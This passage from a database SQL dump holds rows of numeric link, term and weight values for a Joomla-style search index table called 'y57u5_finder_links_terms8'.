(268, 302073, 0.91),
(304, 302073, 0.91),
(268, 302074, 1.00331),
(268, 302075, 0.91),
(268, 302076, 1.05),
(268, 302095, 0.91),
(268, 302096, 1.00331),
(268, 302097, 0.18669),
(268, 302098, 0.88669),
(268, 302099, 0.95669),
(268, 302100, 1.02669),
(268, 302101, 1.07331),
(268, 302102, 0.42),
(268, 302103, 1.00331),
(268, 302104, 1.28331),
(268, 302105, 0.95669),
(268, 302106, 1.02669),
(268, 302107, 0.98),
(268, 302108, 1.09669),
(268, 302109, 2.66339),
(268, 302110, 0.23331),
(268, 302111, 0.93331),
(268, 302112, 1.09669),
(268, 302113, 0.23331),
(268, 302114, 0.93331),
(268, 302115, 1.02669),
(268, 302116, 0.88669),
(268, 302117, 1.05),
(268, 302118, 1.21331),
(268, 302119, 0.86331),
(268, 302120, 0.95669),
(268, 302121, 0.98),
(268, 302122, 1.07331),
(268, 302123, 0.91),
(268, 302124, 1.02669),
(268, 302125, 1.02669),
(268, 302167, 0.84),
(268, 302168, 0.91),
(268, 302169, 0.91),
(268, 302170, 0.88669),
(268, 302171, 0.95669),
(268, 302172, 0.81669),
(268, 302173, 0.88669),
(268, 302174, 0.79331),
(268, 302175, 0.91),
(268, 302176, 1.68),
(268, 302177, 1.82),
(268, 302178, 0.93331),
(268, 302179, 1.02669),
(268, 302180, 0.95669),
(268, 302181, 0.60669),
(268, 302182, 1.07331),
(268, 302183, 1.21331),
(268, 302184, 1.00331),
(268, 302185, 1.07331),
(268, 302186, 0.93331),
(268, 302187, 1.05),
(268, 302188, 0.81669),
(268, 302189, 0.91),
(268, 302190, 0.98),
(268, 302191, 1.14331),
(268, 302192, 1.00331),
(268, 302193, 1.09669),
(268, 302194, 1.19),
(268, 302195, 1.14331),
(268, 302196, 1.00331),
(268, 302197, 0.86331),
(268, 302198, 1.07331),
(268, 302199, 0.93331),
(268, 302200, 1.02669),
(268, 302201, 0.60669),
(268, 302202, 1.07331),
(268, 302203, 1.28331),
(268, 302204, 1.00331),
(268, 302205, 0.95669),
(268, 302206, 1.07331),
(268, 302207, 0.79331),
(268, 302208, 0.91),
(268, 302209, 1.07331),
(268, 302210, 0.98),
(268, 302211, 0.95669),
(268, 302212, 0.95669),
(268, 302213, 0.98),
(268, 302214, 1.05),
(268, 302215, 1.02669),
(268, 302216, 0.86331),
(268, 302217, 0.95669),
(268, 302218, 0.95669),
(268, 302219, 1.02669),
(268, 302220, 0.98),
(268, 302221, 0.86331),
(268, 302222, 0.93331),
(268, 302223, 0.86331),
(268, 302224, 0.98),
(268, 302225, 2.4666),
(268, 302226, 2.8),
(268, 302227, 1.02669),
(268, 302228, 1.12),
(268, 302229, 2.6666),
(268, 302380, 0.95669),
(268, 302381, 1.07331),
(268, 302382, 1.19),
(268, 302383, 1.02669),
(268, 302384, 1.09669),
(268, 302385, 0.98),
(305, 302385, 0.98),
(268, 302386, 1.09669),
(268, 302387, 0.93331),
(268, 302388, 1.05),
(268, 302389, 1.16669),
(268, 302390, 0.84),
(292, 302390, 0.84),
(268, 302391, 0.91),
(269, 303036, 0.42),
(304, 303036, 0.42),
(269, 303037, 1.07331),
(269, 303038, 1.14331),
(269, 303039, 0.98),
(269, 303040, 0.32669),
(269, 303041, 0.95669),
(269, 303042, 1.16669),
(269, 303043, 1.05),
(269, 303044, 0.42),
(269, 303045, 1.02669),
(269, 303046, 1.19),
(269, 303047, 0.86331),
(269, 303048, 1.05),
(269, 303049, 1.00331),
(269, 303050, 1.05),
(269, 303051, 1.00331),
(269, 303052, 0.91),
(269, 303053, 0.98),
(269, 303054, 0.88669),
(269, 303055, 1.02669),
(269, 303056, 0.98),
(269, 303057, 0.91),
(269, 303058, 0.93331),
(269, 303059, 1.00331),
(269, 303060, 1.23669),
(269, 303061, 1.4),
(269, 303075, 2.66339),
(306, 303076, 0.91),
(269, 303076, 1.82),
(269, 303077, 1.02669),
(269, 303078, 1.07331),
(269, 303079, 1.86655),
(269, 303080, 1.09669),
(269, 303081, 1.16669),
(269, 303082, 0.98),
(269, 303083, 1.02669),
(269, 303084, 2.00662),
(269, 303085, 1.09669),
(269, 303086, 1.07331),
(269, 303087, 1.09669),
(269, 303088, 1.21331),
(269, 303089, 0.46669),
(269, 303090, 1.02669),
(269, 303091, 1.07331),
(269, 303092, 0.95669),
(269, 303093, 1.16669),
(269, 303094, 0.91),
(269, 303095, 1.00331),
(269, 303096, 1.00331),
(269, 303097, 1.09669),
(269, 303098, 0.98),
(269, 303099, 1.07331),
(269, 303100, 1.00331),
(269, 303101, 0.98),
(269, 303102, 1.05),
(269, 303103, 1.02669),
(306, 303104, 0.95669),
(269, 303104, 1.91338),
(269, 303105, 2.28662),
(269, 303171, 0.88669),
(269, 303172, 0.93331),
(269, 303173, 0.86331),
(269, 303174, 0.98),
(269, 303175, 0.88669),
(269, 303176, 1.05),
(269, 303177, 1.96),
(269, 303178, 1.00331),
(269, 303179, 0.88669),
(269, 303180, 1.09669),
(269, 303181, 0.81669),
(269, 303182, 0.93331),
(269, 303183, 0.84),
(269, 303184, 0.93331),
(269, 303185, 0.86331),
(269, 303186, 1.07331),
(269, 303187, 1.72662),
(269, 303188, 0.88669),
(269, 303189, 0.95669),
(269, 303190, 0.95669),
(269, 303191, 1.86662),
(269, 303192, 0.95669),
(269, 303193, 1.05),
(269, 303194, 0.95669),
(269, 303195, 1.16669),
(269, 303196, 0.98),
(269, 303197, 0.98),
(269, 303198, 1.14331),
(269, 303199, 1.05),
(269, 303200, 1.05),
(269, 303201, 0.84),
(269, 303202, 1.00331),
(269, 303203, 1.23669),
(269, 303204, 1.00331),
(269, 303205, 1.09669),
(269, 303206, 0.86331),
(269, 303207, 0.98),
(269, 303208, 0.37331),
(269, 303209, 1.05),
(269, 303210, 1.14331),
(269, 303211, 0.91),
(269, 303212, 2.05338),
(269, 303213, 1.07331),
(269, 303214, 0.98),
(269, 303215, 1.05),
(269, 303216, 1.09669),
(305, 303216, 1.09669),
(269, 303217, 0.93331),
(269, 303218, 1.02669),
(269, 303219, 0.95669),
(269, 303220, 0.98),
(269, 303221, 0.86331),
(269, 303222, 1.00331),
(269, 303223, 1.00331),
(269, 303224, 1.02669),
(269, 303225, 2.1),
(269, 303226, 2.4666),
(269, 303227, 2.8),
(269, 303232, 2.6666),
(269, 303294, 0.93331),
(269, 303295, 1.14331),
(269, 303296, 0.86331),
(269, 303297, 1.09669),
(269, 303298, 1.02669),
(269, 303299, 0.95669),
(269, 303300, 1.02669),
(269, 303301, 1.12),
(269, 303302, 1.21331),
(269, 303303, 1.77338),
(269, 303304, 1.02669),
(269, 303305, 0.98),
(269, 303306, 0.56),
(269, 303307, 2.1),
(269, 303308, 1.14331),
(269, 303309, 1.26),
(269, 303310, 0.74662),
(269, 303311, 0.98),
(269, 303312, 1.12),
(269, 303313, 0.95669),
(269, 303314, 1.05),
(269, 303315, 1.09669),
(269, 303316, 1.09669),
(269, 303317, 1.02669),
(269, 303318, 1.02669),
(269, 303319, 0.95669),
(269, 303320, 1.02669),
(269, 303321, 0.93331),
(269, 303322, 1.02669),
(270, 303929, 2.4666),
(270, 303930, 2.8),
(270, 303931, 2.6666),
(272, 303950, 1.09669),
(272, 303951, 1.16669),
(272, 303952, 2.66339),
(272, 303957, 2.4666),
(272, 303958, 2.8),
(272, 303959, 2.6666),
(272, 303966, 0.88669),
(272, 303967, 1.02669),
(274, 304135, 0.88669),
(274, 304136, 0.98),
(274, 304137, 0.98),
(274, 304138, 0.84),
(274, 304139, 0.95669),
(274, 304140, 0.84),
(274, 304141, 0.93331),
(274, 304142, 0.56),
(274, 304143, 1.07331),
(274, 304144, 1.28331),
(274, 304145, 0.95669),
(274, 304146, 1.05),
(274, 304147, 1.02669),
(274, 304148, 1.12),
(274, 304149, 0.88669),
(274, 304150, 0.98),
(274, 304151, 0.23331),
(274, 304152, 0.91),
(274, 304153, 1.05),
(274, 304174, 1.09669),
(274, 304175, 1.19),
(274, 304176, 1.14331),
(274, 304177, 1.00331),
(274, 304178, 2.66339),
(274, 304179, 0.32669),
(274, 304180, 0.91),
(274, 304181, 1.14331),
(274, 304182, 3.84),
(274, 304183, 9.17312),
(274, 304184, 10.88),
(274, 304185, 0.93331),
(274, 304186, 1.19);
INSERT INTO `y57u5_finder_links_terms8` (`link_id`, `term_id`, `weight`) VALUES
(274, 304187, 0.88669),
(306, 304187, 1.77338),
(274, 304188, 0.93331),
(306, 304188, 1.86662),
(274, 304189, 0.95669),
(274, 304190, 1.02669),
(274, 304191, 0.91),
(274, 304192, 0.98),
(274, 304193, 1.07331),
(274, 304194, 1.07331),
(274, 304195, 1.02669),
(274, 304196, 1.07331),
(274, 304197, 1.00331),
(274, 304198, 1.19),
(274, 304199, 2.05338),
(274, 304200, 2.42662),
(274, 304201, 0.18669),
(274, 304202, 0.88669),
(274, 304203, 1.07331),
(274, 304204, 3.31357),
(274, 304205, 0.95669),
(274, 304206, 1.21331),
(274, 304207, 8.96),
(274, 304208, 10.6669),
(274, 304273, 0.91),
(274, 304274, 0.88669),
(274, 304275, 1.00331),
(274, 304276, 0.84),
(274, 304277, 0.95669),
(274, 304278, 1.86662),
(274, 304279, 1.05),
(274, 304280, 1.02669),
(274, 304281, 0.98),
(274, 304282, 1.09669),
(274, 304283, 0.84),
(292, 304283, 0.84),
(274, 304284, 0.93331),
(274, 304285, 0.95669),
(274, 304286, 1.05),
(274, 304287, 0.93331),
(274, 304288, 0.95669),
(274, 304289, 1.09669),
(274, 304290, 1.00331),
(274, 304291, 1.05),
(274, 304292, 1.09669),
(274, 304293, 0.98),
(274, 304294, 1.05),
(274, 304295, 1.00331),
(274, 304296, 1.23669),
(274, 304297, 1.00331),
(274, 304298, 1.12),
(274, 304299, 0.98),
(305, 304299, 0.98),
(274, 304300, 1.07331),
(274, 304301, 1.07331),
(274, 304302, 1.09669),
(274, 304303, 0.98),
(274, 304304, 1.05),
(274, 304305, 0.95669),
(274, 304306, 1.07331),
(274, 304307, 0.91),
(274, 304308, 0.84),
(274, 304309, 0.93331),
(274, 304310, 0.98),
(274, 304311, 2.4666),
(274, 304312, 2.7334),
(274, 304323, 2.6666),
(274, 304324, 0.95669),
(306, 304324, 1.91338),
(274, 304325, 1.07331),
(306, 304325, 2.14662),
(274, 304326, 1.00331),
(274, 304327, 1.09669),
(274, 304328, 0.91),
(274, 304329, 1.00331),
(274, 304330, 0.37331),
(274, 304331, 0.98),
(274, 304332, 1.16669),
(274, 304427, 0.95669),
(274, 304428, 1.26),
(274, 304429, 0.98),
(274, 304430, 1.19),
(274, 304431, 1.12),
(274, 304432, 0.98),
(274, 304433, 1.12),
(274, 304434, 1.19),
(274, 304435, 0.95669),
(274, 304436, 1.09669),
(274, 304437, 0.91),
(274, 304438, 1.00331),
(274, 304439, 0.42),
(274, 304440, 1.12),
(274, 304441, 1.21331),
(274, 304442, 24.3),
(274, 304443, 3.42993),
(274, 304444, 1.19),
(274, 304445, 9.50019),
(274, 304446, 1.12),
(274, 304447, 1.26),
(274, 304448, 1.16669),
(274, 304449, 4.48),
(274, 304450, 1.14331),
(274, 304451, 2.28662),
(274, 304452, 1.19),
(274, 304453, 2.14662),
(274, 304454, 1.14331),
(274, 304455, 1.14331),
(274, 304456, 0.23331),
(306, 304456, 0.23331),
(274, 304457, 1.02669),
(306, 304457, 1.02669),
(274, 304458, 1.09669),
(274, 304459, 0.93331),
(274, 304460, 1.02669),
(274, 304461, 0.93331),
(274, 304462, 1.02669),
(274, 304463, 1.96),
(274, 304464, 2.14662),
(274, 304465, 1.12),
(274, 304466, 1.05),
(274, 304467, 1.07331),
(274, 304468, 1.00331),
(274, 304469, 1.09669),
(274, 304470, 7.98),
(274, 304471, 8.73981),
(274, 304472, 1.07331),
(274, 304473, 0.91),
(274, 304474, 1.02669),
(274, 304475, 1.05),
(274, 304476, 1.07331),
(274, 304477, 1.12),
(274, 304478, 0.98),
(274, 304479, 1.16669),
(274, 304480, 2.14662),
(274, 304481, 1.07331),
(274, 304482, 1.91338),
(274, 304483, 1.14331),
(274, 304484, 1.19),
(274, 304485, 0.93331),
(274, 304486, 1.09669),
(274, 304487, 1.91338),
(274, 304488, 1.07331),
(274, 304489, 1.02669),
(274, 304490, 1.00331),
(274, 304491, 1.09669),
(306, 304492, 0.37331),
(274, 304492, 1.49324),
(274, 304493, 0.95669),
(274, 304494, 1.07331),
(274, 304495, 0.95669),
(274, 304496, 1.07331),
(274, 304497, 0.95669),
(274, 304498, 1.05),
(274, 304499, 0.98),
(274, 304500, 1.23669),
(275, 305088, 0.86331),
(275, 305089, 0.98),
(275, 305090, 0.32669),
(275, 305091, 1.09669),
(275, 305092, 1.28331),
(275, 305093, 1.02669),
(275, 305094, 0.95669),
(275, 305095, 1.02669),
(275, 305096, 0.91),
(275, 305097, 0.98),
(275, 305098, 0.86331),
(275, 305099, 0.95669),
(275, 305100, 2.42662),
(275, 305101, 1.14331),
(275, 305102, 0.42),
(306, 305102, 0.42),
(275, 305103, 1.09669),
(275, 305104, 1.33),
(275, 305105, 1.21331),
(275, 305106, 1.23669),
(275, 305107, 1.23669),
(275, 305108, 1.23669),
(275, 305109, 1.23669),
(275, 305110, 1.4),
(275, 305111, 1.26),
(275, 305112, 1.07331),
(275, 305113, 1.21331),
(275, 305114, 0.91),
(275, 305115, 1.12),
(275, 305116, 0.93331),
(275, 305117, 0.91),
(275, 305118, 1.21331),
(275, 305137, 1.07331),
(275, 305138, 1.23669),
(275, 305139, 1.12),
(275, 305140, 1.19),
(275, 305141, 2.66339),
(275, 305142, 1.09669),
(275, 305143, 1.26),
(275, 305144, 0.37331),
(275, 305145, 0.95669),
(275, 305146, 1.05),
(275, 305147, 1.02669),
(275, 305148, 0.88669),
(275, 305149, 0.98),
(275, 305150, 0.32669),
(275, 305151, 0.95669),
(275, 305152, 1.26),
(275, 305153, 0.88669),
(275, 305154, 1.12),
(275, 305155, 1.02669),
(275, 305156, 0.91),
(275, 305157, 1.09669),
(275, 305158, 0.91),
(275, 305159, 0.98),
(275, 305196, 1.02669),
(275, 305197, 0.88669),
(292, 305197, 0.88669),
(275, 305198, 0.98),
(275, 305199, 0.88669),
(275, 305200, 0.98),
(275, 305201, 1.09669),
(275, 305202, 1.16669),
(275, 305203, 0.23331),
(275, 305204, 0.88669),
(275, 305205, 1.00331),
(275, 305206, 0.86331),
(275, 305207, 1.07331),
(275, 305208, 0.93331),
(275, 305209, 0.98),
(275, 305210, 1.05),
(275, 305211, 0.93331),
(275, 305212, 1.14331),
(275, 305213, 1.05),
(275, 305214, 1.07331),
(275, 305215, 1.16669),
(275, 305216, 1.02669),
(275, 305217, 1.12),
(275, 305218, 1.02669),
(275, 305219, 1.14331),
(275, 305220, 1.02669),
(275, 305221, 1.12),
(275, 305222, 1.05),
(275, 305223, 1.16669),
(275, 305224, 1.07331),
(275, 305225, 1.30669),
(275, 305226, 1.14331),
(275, 305227, 1.07331),
(275, 305228, 1.16669),
(275, 305229, 1.07331),
(275, 305230, 1.19),
(275, 305231, 1.07331),
(275, 305232, 1.19),
(275, 305233, 1.26),
(275, 305234, 1.33),
(275, 305235, 1.09669),
(275, 305236, 1.26),
(275, 305237, 1.09669),
(275, 305238, 1.21331),
(275, 305239, 1.21331),
(275, 305240, 1.05),
(275, 305241, 0.93331),
(275, 305242, 1.14331),
(275, 305243, 1.00331),
(275, 305244, 0.93331),
(275, 305245, 0.93331),
(275, 305246, 1.23669),
(275, 305247, 2.4666),
(275, 305248, 2.6666),
(275, 305251, 2.6666),
(275, 305252, 0.23331),
(275, 305253, 0.88669),
(275, 305254, 1.05),
(275, 305255, 0.98),
(275, 305256, 1.09669),
(275, 305360, 0.95669),
(275, 305361, 1.07331),
(275, 305362, 1.02669),
(275, 305363, 1.16669),
(275, 305364, 0.14),
(275, 305365, 0.88669),
(275, 305366, 0.95669),
(275, 305367, 1.02669),
(275, 305368, 1.09669),
(275, 305369, 0.98),
(275, 305370, 0.56),
(275, 305371, 1.05),
(275, 305372, 1.12),
(275, 305373, 0.93331),
(275, 305374, 1.05),
(275, 305375, 1.07331),
(275, 305376, 1.16669),
(275, 305377, 0.46669),
(275, 305378, 1.00331),
(275, 305379, 1.19),
(275, 305380, 1.02669),
(275, 305381, 1.28331),
(275, 305382, 0.42),
(306, 305382, 0.42),
(275, 305383, 1.00331),
(306, 305383, 1.00331),
(275, 305384, 1.12),
(280, 307590, 8.55),
(280, 307591, 9.30981),
(280, 307592, 0.60669),
(280, 307593, 1.09669),
(280, 307594, 1.16669),
(280, 307596, 2.66339),
(280, 307599, 2.4666),
(280, 307600, 3),
(280, 307601, 2.6666),
(280, 307606, 1.00331),
(280, 307607, 1.26),
(287, 312763, 0.93331),
(287, 312764, 1.07331),
(287, 312833, 0.84),
(287, 312834, 0.95669),
(287, 312835, 0.23331),
(287, 312836, 0.86331),
(287, 312837, 0.98),
(287, 312838, 11.0364),
(287, 312839, 2.66339),
(287, 312840, 3.2),
(287, 312841, 1.86662),
(287, 312842, 1.96),
(287, 312843, 1.07331),
(287, 312844, 2.60661),
(287, 312855, 0.91),
(287, 312856, 1.14331),
(287, 312857, 0.95669),
(287, 312858, 1.12),
(287, 312859, 0.42),
(287, 312860, 0.91),
(287, 312861, 0.93331),
(287, 312862, 0.98),
(287, 312863, 2.21),
(287, 312864, 2.60661),
(287, 312865, 1.05),
(287, 312866, 0.91),
(287, 312867, 0.98),
(287, 312868, 0.95669),
(287, 312869, 1.14331),
(287, 312870, 0.14),
(287, 312871, 0.95669),
(287, 312872, 1.07331),
(287, 312883, 0.86331),
(287, 312884, 0.95669),
(287, 312885, 0.86331),
(287, 312886, 0.98),
(287, 312887, 2.87007),
(287, 312888, 0.98),
(287, 312889, 1.09669),
(287, 312890, 0.95669),
(287, 312891, 1.14331),
(287, 312892, 2.4666),
(287, 312893, 2.9334),
(287, 312894, 0.91),
(287, 312895, 1.14331),
(287, 312932, 0.98),
(287, 312933, 0.86331),
(287, 312934, 0.95669),
(287, 312935, 1.00331),
(287, 312936, 1.16669),
(287, 312937, 0.86331),
(287, 312938, 1.00331),
(287, 312939, 0.32669),
(306, 312939, 0.65338),
(287, 312940, 1.05),
(287, 312941, 1.30669),
(288, 313397, 3.19992),
(288, 313398, 3.52008),
(288, 313399, 0.84),
(288, 313400, 0.95669),
(288, 313401, 0.93331),
(288, 313402, 0.88669),
(288, 313403, 1.00331),
(288, 313404, 1.14331),
(288, 313405, 0.91),
(288, 313406, 1.00331),
(288, 313407, 0.23331),
(304, 313407, 0.23331),
(288, 313408, 0.91),
(288, 313409, 1.02669),
(288, 313410, 0.37331),
(288, 313411, 1.00331),
(288, 313412, 1.05),
(288, 313413, 0.98),
(288, 313414, 1.02669),
(288, 313415, 1.05),
(288, 313416, 1.28331),
(288, 313417, 1.07331),
(288, 313418, 1.00331),
(288, 313419, 1.09669),
(288, 313420, 6.4),
(288, 313421, 1.14331),
(288, 313422, 1.28331),
(288, 313423, 1.07331),
(288, 313424, 1.14331),
(288, 313425, 1.02669),
(288, 313426, 1.12),
(288, 313427, 0.88669),
(288, 313428, 0.93331),
(288, 313429, 1.00331),
(288, 313430, 0.93331),
(288, 313431, 1.05),
(288, 313432, 0.93331),
(292, 313432, 0.93331),
(288, 313433, 1.02669),
(288, 313457, 0.91),
(288, 313458, 0.98),
(288, 313459, 0.88669),
(288, 313460, 1.19),
(288, 313461, 1.77338),
(288, 313462, 1.96),
(288, 313463, 1.07331),
(288, 313464, 1.19),
(288, 313465, 1.12),
(288, 313466, 1.26),
(288, 313467, 0.95669),
(288, 313468, 0.93331),
(288, 313469, 2.00662),
(288, 313470, 0.93331),
(288, 313471, 1.05),
(288, 313472, 0.98),
(288, 313473, 1.07331),
(288, 313474, 1.16669),
(288, 313475, 1.26),
(288, 313476, 0.56),
(288, 313477, 1.07331),
(288, 313478, 1.14331),
(288, 313563, 0.98),
(288, 313564, 0.93331),
(288, 313565, 0.95669),
(288, 313566, 0.98),
(288, 313567, 1.26),
(288, 313568, 0.91),
(288, 313569, 1.05),
(288, 313570, 1.07331),
(288, 313571, 1.00331),
(288, 313572, 1.16669),
(288, 313573, 0.98),
(288, 313574, 1.02669),
(288, 313575, 1.12),
(288, 313576, 0.98),
(288, 313577, 1.05),
(288, 313578, 1.02669),
(288, 313579, 0.60669),
(288, 313580, 1.12),
(288, 313581, 1.21331),
(288, 313582, 0.88669),
(288, 313583, 0.95669),
(288, 313584, 1.09669),
(288, 313585, 1.05),
(288, 313586, 0.98),
(304, 313586, 0.98),
(288, 313587, 1.00331),
(288, 313588, 1.19),
(288, 313589, 0.93331),
(288, 313590, 0.84),
(288, 313591, 0.91),
(288, 313592, 0.95669),
(288, 313593, 1.02669),
(288, 313594, 0.95669),
(288, 313595, 0.91),
(288, 313596, 2.4666),
(288, 313597, 2.9334),
(288, 313604, 2.6666),
(288, 313605, 0.95669),
(288, 313606, 1.26),
(288, 313607, 0.93331),
(288, 313608, 1.23669),
(288, 313609, 1.19),
(288, 313610, 5.37323),
(288, 313611, 1.12),
(288, 313612, 0.91),
(288, 313613, 1.12),
(288, 313614, 1.09669),
(288, 313615, 1.00331),
(288, 313616, 1.00331),
(288, 313712, 1.00331),
(288, 313713, 1.12),
(288, 313714, 1.05),
(288, 313715, 0.98),
(288, 313716, 1.16669),
(288, 313717, 2.33338),
(288, 313718, 1.26),
(288, 313719, 1.28331),
(288, 313720, 1.19),
(288, 313721, 1.30669),
(288, 313722, 2.00662),
(288, 313723, 2.24),
(288, 313724, 1.02669),
(288, 313725, 1.33),
(288, 313726, 1.05),
(288, 313727, 1.12),
(288, 313728, 1.14331),
(288, 313729, 0.86331),
(288, 313730, 0.95669),
(288, 313731, 1.86662),
(288, 313732, 2.05338),
(288, 313733, 0.37331),
(288, 313734, 1.09669),
(288, 313735, 1.21331),
(288, 313736, 1.07331),
(288, 313737, 0.32669),
(288, 313738, 1.12),
(288, 313739, 1.21331),
(288, 313740, 1.12),
(288, 313741, 1.19),
(288, 313742, 1.05),
(288, 313743, 1.12),
(290, 315429, 1.23669),
(290, 315430, 0.51331),
(290, 315431, 1.05),
(290, 315432, 1.21331),
(290, 315433, 1.00331),
(290, 315434, 1.26),
(290, 315435, 1.91338),
(290, 315436, 2.38),
(290, 315437, 0.86331),
(290, 315438, 0.93331),
(290, 315439, 1.30669),
(290, 315440, 2.1),
(290, 315441, 0.91),
(290, 315442, 1.02669),
(290, 315443, 0.91),
(290, 315444, 0.95669),
(290, 315445, 0.8),
(290, 315446, 4.6668),
(290, 315447, 5.4668),
(290, 315448, 0.93331),
(290, 315449, 1.02669),
(290, 315450, 4.23677),
(290, 315451, 3.6),
(290, 315452, 1.05),
(290, 315453, 1.00331),
(290, 315461, 0.98),
(290, 315462, 1.07331),
(290, 315463, 0.91),
(290, 315464, 1.00331),
(290, 315465, 0.98),
(290, 315466, 1.14331),
(290, 315467, 0.91),
(290, 315468, 1.00331),
(290, 315469, 0.98),
(290, 315470, 0.98),
(290, 315547, 0.91),
(290, 315548, 0.93331),
(290, 315549, 0.93331),
(290, 315550, 1.02669),
(290, 315551, 0.88669),
(290, 315552, 1.09669),
(290, 315553, 1.09669),
(290, 315554, 0.91),
(290, 315555, 1.00331),
(290, 315556, 1.05),
(290, 315557, 0.95669),
(290, 315558, 1.07331),
(290, 315559, 0.98),
(290, 315560, 2.4666),
(290, 315561, 2.7334),
(290, 315567, 2.6666),
(290, 315568, 0.32669),
(290, 315569, 0.98),
(290, 315570, 1.07331),
(290, 315571, 1.00331),
(290, 315640, 1.09669),
(290, 315641, 1.00331),
(290, 315642, 1.12),
(290, 315643, 1.02669),
(290, 315644, 1.16669),
(290, 315645, 0.98),
(290, 315646, 1.19),
(290, 315647, 0.98),
(290, 315648, 1.05),
(290, 315649, 1.14331),
(290, 315650, 1.23669),
(292, 317490, 1.12),
(292, 317491, 0.42),
(292, 317492, 0.98),
(292, 317493, 1.12),
(292, 317494, 1.05),
(292, 317495, 0.95669),
(292, 317496, 1.14331),
(292, 317497, 1.16669),
(292, 317498, 1.28331),
(292, 317499, 1.02669),
(292, 317500, 1.09669),
(292, 317501, 1.07331),
(292, 317502, 1.14331),
(292, 317503, 0.91),
(292, 317504, 1.00331),
(292, 317505, 1.09669),
(292, 317506, 1.05),
(292, 317507, 0.98),
(292, 317508, 1.14331),
(292, 317509, 1.19),
(292, 317528, 0.23331),
(292, 317529, 1.00331),
(292, 317530, 1.28331),
(292, 317531, 1.86662),
(292, 317532, 1.00331),
(292, 317533, 1.02669),
(292, 317534, 0.95669),
(292, 317535, 1.02669),
(292, 317536, 0.95669),
(292, 317537, 1.00331),
(292, 317538, 2.66339),
(292, 317539, 1.19),
(292, 317540, 0.84),
(292, 317541, 1.00331),
(292, 317542, 1.14331),
(292, 317543, 1.02669),
(292, 317544, 1.02669),
(292, 317545, 0.98),
(292, 317546, 1.07331),
(292, 317547, 1.07331),
(292, 317548, 1.05),
(292, 317549, 1.14331),
(306, 317549, 3.42993),
(292, 317550, 0.93331),
(292, 317551, 0.98),
(292, 317552, 1.09669),
(292, 317553, 1.02669),
(292, 317633, 0.98),
(292, 317634, 0.95669),
(292, 317635, 1.05),
(292, 317636, 0.88669),
(292, 317637, 1.12),
(292, 317638, 0.86331),
(292, 317639, 1.05),
(292, 317640, 0.93331),
(292, 317641, 0.98),
(292, 317642, 0.91),
(292, 317643, 0.95669),
(292, 317644, 1.00331),
(292, 317645, 0.95669),
(292, 317646, 0.84),
(292, 317647, 0.95669),
(292, 317648, 1.00331),
(292, 317649, 0.95669),
(292, 317650, 0.88669),
(292, 317651, 1.07331),
(292, 317652, 0.81669),
(292, 317653, 0.93331),
(292, 317654, 0.46669),
(292, 317655, 0.98),
(292, 317656, 1.09669),
(292, 317657, 0.91),
(292, 317658, 0.91),
(292, 317659, 1.00331),
(292, 317660, 0.86331),
(292, 317661, 1.00331),
(292, 317662, 0.98),
(292, 317663, 0.95669),
(292, 317664, 0.88669),
(292, 317665, 1.14331),
(292, 317666, 0.60669),
(292, 317667, 1.07331),
(292, 317668, 1.19),
(292, 317669, 1.02669),
(292, 317670, 0.93331),
(292, 317671, 2.00662),
(292, 317672, 0.93331),
(292, 317673, 0.81669),
(292, 317674, 0.91),
(292, 317675, 0.95669),
(292, 317676, 1.00331),
(292, 317677, 1.86662),
(292, 317678, 2.05338),
(292, 317679, 1.02669),
(292, 317680, 2.4666),
(292, 317681, 2.7334),
(292, 317686, 0.04669),
(292, 317687, 0.79331),
(292, 317688, 0.93331),
(292, 317689, 2.6666),
(292, 317841, 0.95669),
(292, 317842, 0.91),
(292, 317843, 1.00331),
(292, 317844, 0.95669),
(292, 317845, 1.02669),
(292, 317846, 0.95669),
(292, 317847, 1.19),
(292, 317848, 0.95669),
(292, 317849, 1.02669),
(292, 317850, 0.98),
(292, 317851, 1.21331),
(292, 317852, 0.86331),
(292, 317853, 1.00331),
(292, 317854, 0.95669),
(292, 317855, 1.05),
(292, 317856, 0.37331),
(292, 317857, 0.95669),
(292, 317858, 1.12),
(292, 317859, 1.14331),
(292, 317860, 0.51331),
(292, 317861, 1.02669),
(292, 317862, 1.12),
(292, 317863, 0.93331),
(292, 317864, 1.07331),
(292, 317865, 1.02669),
(292, 317866, 1.12),
(292, 317867, 0.42),
(292, 317868, 0.98),
(292, 317869, 1.26),
(292, 317870, 0.93331),
(294, 318443, 0.91),
(294, 318444, 0.98),
(294, 318445, 2.4666),
(294, 318446, 3),
(294, 318453, 2.6666),
(294, 318456, 0.88669),
(294, 318457, 0.95669),
(294, 318458, 2.56),
(294, 318459, 9.6),
(294, 318460, 11.9469),
(295, 318527, 0.21),
(295, 318528, 0.88669),
(295, 318529, 0.98),
(295, 318602, 0.37331),
(295, 318603, 0.98),
(295, 318604, 1.19),
(295, 318605, 1.07331),
(295, 318606, 1.26),
(295, 318616, 0.37331),
(295, 318617, 1.07331),
(295, 318618, 1.4),
(295, 318619, 1.16669),
(295, 318620, 1.21331),
(295, 318621, 0.98),
(295, 318622, 1.14331),
(295, 318623, 0.91),
(295, 318624, 1.00331),
(295, 318625, 0.23331),
(295, 318626, 1.00331),
(295, 318627, 1.19),
(295, 318628, 1.00331),
(295, 318629, 1.09669),
(295, 318630, 1.05),
(295, 318631, 1.23669),
(295, 318632, 1.05),
(295, 318633, 1.00331),
(295, 318634, 1.12),
(295, 318635, 1.07331),
(295, 318636, 0.28),
(295, 318637, 1.02669),
(295, 318638, 1.12),
(295, 318639, 0.28),
(295, 318640, 1.09669),
(295, 318641, 1.26),
(295, 318642, 0.95669),
(295, 318643, 1.12),
(295, 318657, 0.56),
(295, 318658, 1.86662),
(295, 318659, 2.14662),
(295, 318660, 0.46662),
(295, 318661, 0.98),
(295, 318662, 1.14331),
(295, 318663, 0.98),
(295, 318664, 1.07331),
(295, 318665, 0.28),
(295, 318666, 0.93331),
(295, 318667, 1.05),
(295, 318668, 0.86331),
(295, 318669, 2.4666),
(295, 318670, 2.8),
(295, 318681, 2.6666),
(295, 318682, 0.09331),
(295, 318683, 0.79331),
(295, 318684, 0.98),
(295, 318733, 0.98),
(295, 318734, 1.14331),
(295, 318735, 1.09669),
(295, 318736, 1.19),
(298, 320110, 1.00331),
(308, 320110, 1.00331),
(298, 320111, 1.16669),
(308, 320111, 1.16669),
(298, 320112, 1.02669),
(308, 320112, 1.02669),
(298, 320113, 1.14331),
(308, 320113, 1.14331),
(298, 320114, 1.05),
(308, 320114, 1.05),
(298, 320115, 0.98),
(308, 320115, 0.98),
(298, 320116, 1.14331),
(308, 320116, 1.14331),
(298, 320117, 1.09669),
(308, 320117, 1.09669),
(298, 320118, 0.93331),
(308, 320118, 0.93331),
(298, 320119, 1.05),
(308, 320119, 1.05),
(298, 320133, 1.02669),
